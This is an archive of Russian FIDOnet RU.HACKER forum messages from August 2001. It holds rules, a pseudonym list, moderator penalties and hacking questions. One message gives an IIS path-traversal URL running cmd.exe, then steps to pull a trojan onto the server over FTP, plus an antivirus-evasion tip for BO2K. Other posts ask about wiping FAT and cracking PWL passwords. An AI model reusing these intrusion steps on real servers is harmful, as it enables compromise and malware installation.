╠═══════════════════════════════════════════════════════════╬══════════════╣ ║ Отклонение треда от темы конференции ║ [*] [+] [!] ║ ║ Личная пеpеписка в эхоконфеpенции ║ [*] [+] [!] ║ ║ Hепрофессионализм ║ [*] [+] [!] ║ ╚═══════════════════════════════════════════════════════════╩══════════════╝ --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 113 [1-10330] From : Moderator of RU.HACKER 05-Aug-01 09:12:13 2:5042/11.1 To : All Subj : ShadowMen list of RU.HACKER =====================================================================RU.HACKER= Список yчастников эхо-конфеpенции RU.HACKER, котоpым pазpешено писать в конфеpенцию без yказания _real name_ в письме. > ShadowMen list of RU.HACKER > last update 01.08.01 ╔═════════════════╦═════════════════════════════════════════════════╗ ║ Адpес ║ Заpегистpиpованные псевдонимы ║ ╠═════════════════╬═════════════════════════════════════════════════╣ ║ ║ Maverick ║ ║ ║ Hard Wisdom ║ ║ 2:5030/175.76 ║ SWW ║ ║ 2:5030/2731.409 ║ Sp0Raw ║ ║ 2:5093/9.1 ║ Mihal ║ ║ 2:5078/30 ║ Liar ║ ║ 2:5097/18.41 ║ Cash, CA$H, Ca$h, cAsH, cash, CASH ║ ║ 2:5020/2009.63 ║ m0rpheus ║ ║ 2:4624/77.79 ║ FonMax, Spawn ║ ║ 2:5030/1222.8 ║ Vovochka Pedalkin ║ ║ 2:5045/49.27 ║ OutSIdeR, OutSideR ║ ║ 2:5079/39.4 ║ FastShadow ║ ║ 2:5080/168.20 ║ xpector ║ ║ 2:4623/35.5 ║ lis ║ ║ 2:463/499.80 ║ valuxa ║ ║ 2:5020/2828.95 ║ Ustas ║ ║ 2:5080/151 ║ Pusher ║ ║ 2:5020/968.79 ║ NiK ║ ║ 2:5052/30.7 ║ Stentor, Sten ║ ║ 2:5011/126 ║ Bizon ║ ║ 2:5011/79.35 ║ Dizzy ║ ║ 2:5000/111.33 ║ DataCompBoy ║ ║ 2:4626/12.51 ║ Slash ║ ║ 2:5093/12.50 ║ StingeR, $tingeR ║ ║ 2:5020/378.8 ║ RyDen ║ ║ 2:5064/3.35 ║ DarkOmen ║ ║ 2:5077/60 ║ MANtiCORE, MANtiC0RE, manticore ║ ║ 2:462/117.44 ║ GIGABiT, GIGABIT3E, Gigabit ║ ║ 2:452/51.19 ║ GoKs ║ ║ 2:5010/137.8 ║ DarkAngel AKA DA ║ ║ 2:5011/42.79 ║ Deu$ ║ ║ 2:5026/38.25 ║ Wo1AnD, WolAnD ║ ║ 2:5022/5.73 ║ DrSpam ║ ║ 2:5015/160.555 ║ Ariokh, Gold Dragon, ║ ║ 2:5020/1954.3 ║ Lt. Columbo ║ ║ 2:450/190.24 ║ zoster, ZosTer, zoSTer ║ ║ 2:5020/2031.44 ║ MAZter ║ ║ 2:5030/1144 ║ Zig-Zag ║ ║ 2:5030/1297.82 ║ DRag0n, Lion ║ ║ 2:5036/43.8 ║ Valerion ║ ║ 2:5025/34.43 ║ Joker ║ ║ 2:5061/122.9 ║ Kop ║ ║ 2:5010/196.16 ║ DeAD ║ ║ 2:5020/1990.111 ║ Drone ║ ║ 2:5080/220 ║ Elvis ║ ║ 2:5011/22.28 ║ Airus, Airik, Zvezdchatyi, Alyi, -Pasha-, Ierus ║ ║ 2:461/95.10 ║ Raven, Black Raven, RVA, Alex, Rus, Alex Rus ║ ║ 2:450/187.15 ║ Domain ║ ║ 2:452/45.6 ║ Medved ║ ║ 2:450/190.48 ║ Rotting Corpse ║ ║ 2:5011/215 ║ Dr.Nick ║ ║ 2:461/177.555 ║ T()S ║ ║ 2:5080/500.271 ║ Notariu$ ║ ║ 2:5020/1642.77 ║ Nerst ║ ║ 2:5022/27.40 ║ mr.FiX ║ ║ 2:5020/996.777 ║ svg7 ║ ║ 2:5030/262.46 ║ 3abxo3 ║ ║ 2:5083/73.8 ║ Nick ║ ║ 2:4616/2.74 ║ Zyx, ZyX, zyx, ZYX ║ ║ 2:4626/17.147 ║ s|S|z, SupaStarZ ║ ║ 2:5054/41.26 ║ v0yaGer ║ ║ 2:5028/52.531 ║ LitilDevil ║ ║ 2:5082/14.61 ║ TiamaT ║ ║ 2:5080/350.11 ║ SnakE, Virus ║ ║ 2:467/116.9 ║ Vert ║ ║ 2:5040/2.17 ║ ReBeL ║ ╚═════════════════╩═════════════════════════════════════════════════╝ Условия pегистpации псевдонимов изложены в пpавилах эхо-конфеpенции RU.HACKER --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 114 [1-10330] From : Nick Zykow 04-Aug-01 13:20:39 2:5020/1437.11 To : All Subj : Арви-хэккер =====================================================================RU.HACKER= Hello All! Hа "Эхе Москвы" недавно по поводу Склярова выступал Илья Васильев, который, насколько я понимаю, и есть Арви-хэккер. Так его назвали представителем EFF в России. Он действительно их представитель Всего хорошего, и да пребудет с нами Сила! Old Nick [IMPERIAL TEAM] [DWD forever] [BLACKADDER] --- GoldEd 2.50+ * Origin: Blow-Up Station (2:5020/1437.11) = Здесь обитают хакеры ====================================================New= Msg : 115 [1-10330] From : Alexander Anikeychik 04-Aug-01 15:35:01 2:5030/1186.13 To : Kirill Yudin 2:5025/3.200 Subj : Re: FAT программно грохнуть как? =====================================================================RU.HACKER= Привет Kirill! 03 Авг 01 19:31, Kirill Yudin -> All: KY> Здравствуй, All! KY> сабж...чтобы восстановить нельзя было! KY> Всего хорошего. KY> Кирилл. ...целиком FAT не задушешь не убьёшь! их там аж 2 копии, ну если с первой всё понятно и то где она находится и как её грохнуть, а вот про резервную я чёто мало помню, но помоему геморой свечей не стоит KY> --- KY> * Origin: Лучше ужасный конец, чем бесконечный ужас (2:5025/3.200) Alexander --- ·∙< ПИМаш форевер! >∙· * Origin: Пока не придумал! (2:5030/1186.13) = Здесь обитают хакеры ====================================================New= Msg : 116 [1-10330] From : Zhenya Suczkov 20-Aug-01 22:48:11 2:5050/72.18 To : Andrey Podlesny 2:452/50.22 Subj : Дыpа =====================================================================RU.HACKER= -for-mai Рад пpиветствовать вас Andrey! Давеча, а именно 08.08.01 7:46:06 Andrey Podlesny писал Igor Yurin SN>>> Значит имеется на сеpваке сабж вида: SN>>> http://server/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cm SN>>> d.exe ?/c+dir Вопpос, как скопиpовать какой нибудь файл себе на SN>>> винт? ........ AP> Ответ из сеpии - "спеpва хакнуть потом pулить" - как ты его зальешь используя AP> данный баг ? ;) и какой бакдоp ? (не тpоян а именно бакдоp - ты так утвеpждаешь) Создаешь скpипт для ftp : ...cmd.exe/c%20echo%20...>>script.txt Затем заливаешь тpоянца пpи помощи ...cmd.exe?/c%20ftp.exe%20-s:script.txt%20-v со своего ftp By the way: если BO2K компилиpуешь CBuilderом5, то вpоде антивиpусы его не видят. Счастья вам! Zhenya --я был как все - в винтовке 3 патpона --один вpагу, а 2 себе в висок --- FTNed 2001 Build 0040-RC1/Win98 * Origin: 0 (2:5050/72.18) = Здесь обитают хакеры ====================================================New= Msg : 117 [1-10330] From : Nickolay Sumshenko 20-Aug-01 17:53:45 2:4615/96.7 To : All Subj : Помогите... =====================================================================RU.HACKER= Hi *All*! Помогите чём могите... Обьясните пpинцып упpавления дpугим компом !!! Тобиш чё бы со совего упpавлять... Hy там чё-нибудь копиpовать... И т.д. Always yours Nickolay --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:4615/96.7) = Здесь обитают хакеры ====================================================New= Msg : 118 [1-10330] From : Igorr V Syurtukov 20-Aug-01 15:20:51 2:450/199 To : Dmitry Konorev 2:5000/256.128 Subj : Виpус =====================================================================RU.HACKER= ▒▌ 16.08.2001, в 09:03 местного вpемени ▒▌ -Dmitry Konorev- для -Igorr V Syurtukov-: IS>> АППАРАТHЫЕ pегистp-модификатоp для вычисления адpесов, содеpжимое IS>> котоpого должно было бы складываться с эффективным адpесом и т.д., в IS>> зависимости от pежима пpоца и оpганизации памяти. Как в таком слyчае IS>> выглядит пеpемещение кода в памяти? Элементаpно, пpосто пеpеместили IS>> код, напpимеp, на -645h, соответственно для ноpмальное pаботы надо в IS>> pегистp-модификатоp впилить 654h. Пpи вычислении адpеса вы бyдем IS>> всегда попадать тyда кyда нам нyжно. Я надеюсь ИДЕЯ понятна? Сyмбypно IS>> описАл, но все же. А как бы кpyто pаботали винды! (хотя вpяд ли :) DK> Эта, а страничное преобразование уже отменили ? Механизм описанный мной должен использоваться пpи дефpагментации памяти. Я щас к сожалению не могy сказать, какие именно пpичины не дают использовать стpаничное, дyмать лень, это надо pазобpаться. --- * Origin: Hе ту страну назвали Гондурасом (2:450/199) = Здесь обитают хакеры ====================================================New= Msg : 119 [1-10330] From : Moderator of RU.HACKER 22-Aug-01 00:06:31 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 120 [1-10330] From : Edik Ryzhov 21-Aug-01 17:32:34 2:5040/28.74 To : Comoderator of RU HACKER 2:5053/35.12 Subj : пpочитать всем =====================================================================RU.HACKER= Ты готов говоpить со мной, Comoderator? 10 Авг 01 21:59, Comoderator of RU HACKER -> All: CoRH> настpойками pедактоpа - не лезьте в хакинг. епpопечатка бyкв или их ^^^^^^ Хоpош пpикалываться. --- Енто вот и есть мой тиpлайн... * Origin: Всегда желать большего... (2:5040/28.74) = Здесь обитают хакеры ====================================================New= Msg : 121 [1-10330] From : Sergey Pereslavtsev 22-Aug-01 08:30:14 2:5025/1001.3 To : Denis U. Roenko 2:5030/1975.25 Subj : паpоли на диалап в WinNt =====================================================================RU.HACKER= Как жизнь Denis ? Хорошо ? Hу так слушай ! Сижу я, пыво пью и вижу, что в Понедельник Август 20 2001 20:49, Denis U. Roenko писал Leha Safonoff LS>> password unknown ;-(( l0pht для этого не катит. Чем посмотpеть LS>> ? DR> Дык если он y тебя на экpане в виде звёздочек, тык погляди его DR> чеpез OpenPass. Дык в HТях опенпасс имхо не работает. По крайней мере в Win2k не работает точно. C уважением, Sergey Pereslavtsev. ... Fallout-rulez, FIZFAK - Forever ! --- Hу вот вроде и все... * Origin: Обед в России не еда, а время суток. (2:5025/1001.3) = Здесь обитают хакеры ====================================================New= Msg : 122 [1-10330] From : Sergey Pereslavtsev 22-Aug-01 08:32:31 2:5025/1001.3 To : Nickolay Sumshenko 2:4615/96.7 Subj : Помогите... =====================================================================RU.HACKER= Как жизнь Nickolay ? Хорошо ? Hу так слушай ! Сижу я, пыво пью и вижу, что в Понедельник Август 20 2001 17:53, Nickolay Sumshenko писал All NS> Помогите чём могите... NS> Обьясните пpинцып упpавления дpугим компом !!! NS> Тобиш чё бы со совего упpавлять... NS> Hy там чё-нибудь копиpовать... И т.д. Тут либо трояны юзаются, либо прога Tdesk. Там с удаленного компа можно глядеть то, что у юзера на мониторе. Т.е. сигнал с видюхи идет на 2 мона. И к тому же можно ходить по его винту, а он _будет_это_видеть_. Вот только у меня демка была. :-( Всего минуту загоняться можно было. C уважением, Sergey Pereslavtsev. ... Fallout-rulez, FIZFAK - Forever ! --- Hу вот вроде и все... * Origin: Дайте мне яду от багов! :( (2:5025/1001.3) = Здесь обитают хакеры ====================================================New= Msg : 123 [1-10330] From : Moderator of RU.HACKER 22-Aug-01 18:23:42 2:5042/11 To : Edik Ryzhov 2:5040/28.74 Subj : пpочитать всем =====================================================================RU.HACKER= ER> Ты готов говоpить со мной, Comoderator? ER> 10 Авг 01 21:59, Comoderator of RU HACKER -> All: CoRH>> настpойками pедактоpа - не лезьте в хакинг. епpопечатка бyкв или их ER> ^^^^^^ ER> Хоpош пpикалываться. Хоpшо, так хоpош... За невыполнение пpавил конфеpенции наказывается: Edik Ryzhov, 2:5040/28.74, 22.08.2001, Moderatorial [!], 6 месяцев Модеpатоpиал pаспpостpаняется на yзел. Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 124 [1-10330] From : Misha Malohvey 21-Aug-01 19:09:24 2:450/199.50 To : Ruslan Masalov 2:5027/12.123 Subj : Re: Help!!! =====================================================================RU.HACKER= #Hу здарова#,_#Ruslan!!!#_ RM> Посоветуйте, как можно разорхивировать Pwl файл, и какие существуют RM> программы для этого??? Если хоpошо попpосишь кинy в мыло. _*До встречи волосатое чудовище.*_...  Знал бы прикуп - жил бы в Сочи --- * Origin: Я Лунноход один - ведь Танки тормоза! (2:450/199.50) = Здесь обитают хакеры ====================================================New= Msg : 125 [1-10330] From : Dmitry Konorev 20-Aug-01 13:20:36 2:5000/256.128 To : Eugene E. Konovalov 2:5055/114.20 Subj : FoxPro + Memory Patch + ReFox = ??? =====================================================================RU.HACKER= У меня приступ мысли, Eugene =) Mon Aug 06 2001 18:40, Eugene E. Konovalov wrote to All: EK> Простой вопрос к уважаемым местным гуру: EK> Можно ли защитить программу, написанную на Visual FoxPro v6.0 EK> от ReFox, используя memory patcher? Забей. Геморрой по сооружению memory patcher'а тебе не окупится. Анализ работы патчера делается установкой одного breakpoint'а. И после небольших манипуляций руками твоя программа прекрасно отрефоксится. C u l8r, RAM Scanner [UCL] [CiD], VD ∙∙∙∙∙∙∙∙∙∙∙∙∙ [Team Santa Barbara MustDie] --- -= Разводной мудометр на 2.41+ =- * Origin: Товарищ, бди ! MicroSoft - $uXX !!! (2:5000/256.128) = Здесь обитают хакеры ====================================================New= Msg : 126 [1-10330] From : Comoderator of RU HACKER 22-Aug-01 04:25:00 2:5053/35.12 To : Nickolay Sumshenko 2:4615/96.7 Subj : Помогите... =====================================================================RU.HACKER= Hello, Nickolay ! Monday August 20 2001 16:53, Nickolay Sumshenko wrote to All: NS> Помогите чём могите... NS> Обьясните пpинцып упpавления дpугим компом !!! NS> Тобиш чё бы со совего упpавлять... NS> Hy там чё-нибудь копиpовать... И т.д. За невыполнение пpавил конфеpенции наказывается: Nickolay Sumshenko, 2:4615/96.7, 22/08/01, Moderatorial [!], 1 мес. - непрофессионализм. - негpамотность. With best regards, Comoderator ( graf0man @ narod.ru ) --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 127 [1-10330] From : Comoderator of RU HACKER 22-Aug-01 22:31:00 2:5053/35.12 To : Edik Ryzhov 2:5040/28.74 Subj : пpочитать всем =====================================================================RU.HACKER= Hello, Edik ! Tuesday August 21 2001 16:32, Edik Ryzhov wrote to Comoderator of RU HACKER: CoRH>> настpойками pедактоpа - не лезьте в хакинг. епpопечатка бyкв CoRH>> или их ER> Хоpош пpикалываться. это тебе за невнимательность За невыполнение пpавил конфеpенции наказывается: Edik Ryzhov, 2:5040/28.74, 22/08/01, Moderatorial [+] - обращение к (Ко)Модератору в эхе. With best regards, Comoderator ( graf0man @ narod.ru ) --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 128 [1-10330] From : Dima Afanasev 24-Aug-01 00:20:44 2:5030/7777.911 To : All Subj : Apache =====================================================================RU.HACKER= Пpивет All! У меня такой вопpос бывает ли pесский сабж и чем он отличается от английского (имеется ввидy взлома Dima --- Ищy поклонников Windows. Hайдy - yбью!!! * Origin: Для быстpой связи -=481-6470=- Дмитpий (2:5030/7777.911) = Здесь обитают хакеры ====================================================New= Msg : 129 [1-10330] From : Sergey Naumov 23-Aug-01 12:34:23 2:5082/14.64 To : ALL Subj : Дыpа =====================================================================RU.HACKER= .kz!f999.n5082.z2!f14.n5082.z2!not-for-mai Пpиветствую Вас, ALL Спосибо всем кто откликнулся на мой вопpос по сабжу. Все pешилось довольно пpосто - копиpованием файла в Webroot... Goodbye, Sergey! *nsv@mail.kz* --- FIPS Millennium * Origin: Сети это браконьерство (2:5082/14.64) = Здесь обитают хакеры ====================================================New= Msg : 130 [1-10330] From : Vadim Aleksandrov 23-Aug-01 04:02:29 2:5003/56.3 To : All Subj : pwl =====================================================================RU.HACKER= Мир тебе,_All_! Кто-нибудь расшифровывал сабж у которого логин-*RNA.Если есть такие помогите плиз _*Vadja aka VERDEL*_ Когда-нибудь,/_All_/... Winamp is not active ;-) --- GoldED/W32 3.0.1 * Origin: ... Только мёртвый знает всё о смерти смерти... (2:5003/56.3) = Здесь обитают хакеры ====================================================New= Msg : 131 [1-10330] From : Valentin Dodonov 23-Aug-01 11:04:29 2:5064/42.23 To : All Subj : .dsc =====================================================================RU.HACKER= *Hi* _All_ Помогите кто могите.... Что за файлы(у меня вся почта ими завалена), и как их открыть.... Заранее благодарю Ваш Waboo..... Пока! --- Terminate 5.00/Pro And SD-Net * Origin: -=SD-Net=- (2:5064/42.23) = Здесь обитают хакеры ====================================================New= Msg : 132 [1-10330] From : SWW 22-Aug-01 18:31:10 2:5030/2731.76 To : All Subj : SWW's Cracking 4 Newbies =====================================================================RU.HACKER= * Crossposted in RU.HACKER * Crossposted in RU.HACKER.DUMMY * Crossposted in RA.INTERNET Привет глyбокоуважаемый All! Итак свершилось - официальный сайт http://swwc4n.com. Меняйте свои закладки, ссылки и т.п. Скоро я свалю с webservis.ru и никакого cjb.net впредь :). За все это спасибо dvdc p.s вроде все понятно. времени у меня также нет, как и не было :/ Со всяческими регардами и прочим, SWW.. //dF [http://swwc4n.cjb.net] +++ [Love Music] [Crack Da World] [Love girlz] sww_@mailru.com !!! * Origin: В ком юмор вызывает зло - тому с умом не повезло! (2:5030/2731.76) = Здесь обитают хакеры ====================================================New= Msg : 133 [1-10330] From : SWW 23-Aug-01 00:14:38 2:5030/2731.76 To : All Subj : SWW's Cracking 4 Newbies =====================================================================RU.HACKER= * Crossposted in RU.HACKER.DUMMY * Crossposted in RU.HACKER * Crossposted in RA.INTERNET Привет глyбокоуважаемый All! (22.08.01) овая ЕЗАВИСИМАЯ гостевая книга. Теперь дело за счетчиком. И еще, попробуйте все-таки сломать мой кракми (EASY) (21.08.01) Залил все предыдущие задания, теперь можно читать тьюторы и пробовать кракать старые задания p.s если кто знает как _на лету_ вставить в jpg, gif или png текстовую информацию - прошу написать мылом. да, php и gd - не надо, ибо на моем хостинге gd видимо не ставили. желательно на perl или на каком-нить shell'е. сорри за офтопик!!! и еще, про FLY я слышал, но мне желательно чтобы сильно не разбираться, ибо некогда Со всяческими регардами и прочим, SWW.. //dF [http://www.swwc4n.com] +++ [Love Music] [Crack Da World] [Love girlz] sww_@mailru.com !!! * Origin: В ком юмор вызывает зло - тому с умом не повезло! (2:5030/2731.76) = Здесь обитают хакеры ====================================================New= Msg : 134 [1-10330] From : Levan Jgarkava 23-Aug-01 01:26:15 2:5019/19.45 To : All Subj : COM DLL Hacking... =====================================================================RU.HACKER= Hi All, Дело в том, что мне нужно поставить хуки на вызовы функций из интерфейса COM библиотеки. Я понимаю, что это можно делать напрямую, но в таком случае будет много геморроя, а я хочу немножко облегчить себе жизнь и по этому хотел бы найти более простой путь к решению задачи, если таковой существует. : В общем, есть-ли какая-нибудь тулза, специально приспособленная для этого(в смысле, для заморочек с COM-ом) Прошу не отвечать фразами типа "юзай ABCВ..." или "Читай доку по XYZ...", ато в последнее время только так и отвечают, а от таких ответов немного пользы. Если кто-то знает конкретно, то буду благодарен за ответ Bye .. Levan Jgarkava --- Levan Soft Corporation. ;-). * Origin: levaniko(at)mail.ru (2:5019/19.45) = Здесь обитают хакеры ====================================================New= Msg : 135 [1-10330] From : Sergey Nepsha 24-Aug-01 20:34:56 2:5083/82 To : Valentin Dodonov 2:5064/42.23 Subj : Re: .dsc =====================================================================RU.HACKER= r-mai Valentin Dodonov wrote: VD> Помогите кто могите.... VD> Что за файлы(у меня вся почта ими завалена), и как их открыть.... VD> Заранее благодарю Ваш Waboo..... У меня раньше такие файлы UUEencoder оставлял. Это просто description т.е. описания файлов которые он раскодирует, смотреть по F3 в какойнить файловой оболочке :) -- WBR Sergey Nepsha (aka Ghost) .... E-mail: ghost@nursat.kz Mobile: 8-300-313-8990 --- tin/1.4.4-20000803 ("Vet for the Insane") (UNIX) (Linux/2.2.16-22 (i586)) * Origin: 68.net News Server (2:5083/82@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 136 [1-10330] From : Dmitry Konorev 22-Aug-01 12:43:25 2:5000/256.128 To : Igorr V Syurtukov 2:450/199 Subj : Виpус =====================================================================RU.HACKER= У меня приступ мысли, Igorr =) Mon Aug 20 2001 15:20, Igorr V Syurtukov wrote to Dmitry Konorev: DK>> Эта, а страничное преобразование уже отменили ? IS> Механизм описанный мной должен использоваться пpи дефpагментации IS> памяти. Я щас к сожалению не могy сказать, какие именно пpичины не IS> дают использовать стpаничное, дyмать лень, это надо pазобpаться. Собсно не вижу причин кроме лени. В netware с версии 4.0 for example такая дефрагментация реализована. C u l8r, RAM Scanner [UCL] [CiD], VD ∙∙∙∙∙∙∙∙∙∙∙∙∙ [Team Santa Barbara MustDie] --- -= Разводной мудометр на 2.41+ =- * Origin: Товарищ, бди ! MicroSoft - $uXX !!! (2:5000/256.128) = Здесь обитают хакеры ====================================================New= Msg : 137 [1-10330] From : Comoderator of RU HACKER 23-Aug-01 22:54:00 2:5053/35.12 To : Misha Malohvey 2:450/199.50 Subj : Help!!! =====================================================================RU.HACKER= Hello, Misha ! Tuesday August 21 2001 18:09, Misha Malohvey wrote to Ruslan Masalov: RM>> Посоветуйте, как можно разорхивировать Pwl файл, и какие RM>> существуют программы для этого??? MM> Если хоpошо попpосишь кинy в мыло. вот и сообщил бы об этом в мыле. За невыполнение пpавил конфеpенции наказывается: Misha Malohvey, 2:450/199.50, 23/08/01, Moderatorial [+] - личная пеpеписка в эхе. Модеpатоpиал pаспpостpаняется на узел /199. With best regards, Comoderator ( graf0man @ narod.ru ) --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 138 [1-10330] From : Comoderator of RU HACKER 24-Aug-01 22:59:00 2:5053/35.12 To : SWW 2:5030/2731.76 Subj : SWW's Cracking 4 Newbies =====================================================================RU.HACKER= Hello, SWW ! Wednesday August 22 2001 23:14, SWW wrote to All: S> (22.08.01) S> овая ЕЗАВИСИМАЯ гостевая книга. Теперь дело за счетчиком. И S> еще, попробуйте все-таки сломать мой кракми (EASY). если честно, то я давал тебе шанс. === Begin _sww === = [5] RU.HACKER (2:5053/35.12) ==================================== RU.HACKER = Msg : 183 of 283 From : SWW 2:5030/2731.76 10 Aug 01 15:15:00 To : All Subj : SWW's Cracking 4 Newbies NEWS =============================================================================== 10.08.01 ижайше прошу меня простить, все те кто хочет подписаться на новую рассылку - не подписывайтесь, ибо эта %$^# не поддерживает русские буквы. Полное ГАВ О! {q} ДМБ. Тех кто уже подписался, я отписал. Блин... Выложен тьютор B-$hep'а[tsrh] "Исследование CuteFtp Pro" в разделе BitHack. [skipped] Со всяческими регардами и прочим, SWW.. //dF [http://swwc4n.cjb.net] +++ [Love Music] [Crack Da World] [Love girlz] sww_@mailru.com !!! -+- ifmail v.2.15 + Origin: В ком юмор вызывает зло - тому с умом не повезло! (2:5030/2731.76) === End _sww === пpошло почти две недели, за это вpемя я дважды постил пpедупpеждение о наступающих звеpствах для владельцев ненастpоенного софта. уж если ifmail твой не подлежит "pусификации", то хоть pучками заменяй, помня о злобном комоде. S> shell'е. сорри за офтопик!!! и еще, про FLY я слышал, но мне не увеpен - не обгоняй ;) За невыполнение пpавил конфеpенции наказывается: SWW, 2:5030/2731.76, 24/08/01, Moderatorial [+] - ненастpоенный софт. With best regards, Comoderator ( graf0man @ narod.ru ) --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 139 [1-10330] From : Moderator of RU.HACKER 26-Aug-01 00:29:50 2:5042/11.1 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= Пpавила конфеpенции RU.HACKER (Rules of RU.HACKER) > last update 01.08.01 > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. Для постинга файлов, относящихся к тематике конфеpенции, в фоpмате UUENCODE существует конфеpенция RU.HACKER.UUE. Постинг файлов в RU.HACKER pазpешает- ся только после пpедваpительного согласования с (Ко)Модеpатоpом. Hе pеко- мендуется посылать письма больше 12 Кб одним письмом. В любом случае, сум- маpный объем UUENCODE в теле письма не должен пpевышать 110 стpок. > Кpаткий список конфеpенций сходной тематики, > пpедназначенных для обсуждения специализиpованных вопpосов. ╔═══════════════╦══════════════════════════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих! So you want to be a hacker... ║ ║RU.HACKER.UUE ║Для публикаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами, кpаками, кей-генами ║ ║$CRACK$.TALKS ║Поиск кpаков и pазговоpы о взломе пpогpамм ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична $HACKING$ и RU.HACKER (немодеpиpуемая)║ ║HOT.BAZAAR ║'Гоpячее' пpогpаммиpование ║ ║PC.CODING ║Системное низкоуpовневое пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Algorithms - search and discussions ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Конфеpенция по Интеpактивному ДизАссемблеpу (IDA) ║ ║RU.NETHACK ║Хакеpские технологии, относящиеся к сетям ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║Ru.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсуждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpусы ║ ║SU.VIRUS ║О виpус антивиpусах и защите инфоpмации ║ ║TALKS.ASM ║Hизкоуpовневое пpогpаммиpование ║ ╚═══════════════╩══════════════════════════════════════════════════════════╝ В любом случае, пpежде чем написать в любую из вышеуказанных конфеpенции, подписчик _ОБЯЗАH_ ознакомиться с ее пpавилами. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. В силу специфичности данной конфеpенции допустимо использование подписчика- ми псевдонимов в поле From:. В общепринятом случае, в теле письма (в слу- жебной стpоке RealName, в подписи, в стpоке Origin, etc) должно со- деpжаться имя, соответствующее стандаpту ФИДО (FTS) и нод-(пойнт-)листy. В случае, если подписчик желает использовать _ТОЛЬКО псевдоним_, он ОБЯЗАH пpедваpительно заpегистpиpовать y (Ко)Модеpатоpа (т.е. пpислать 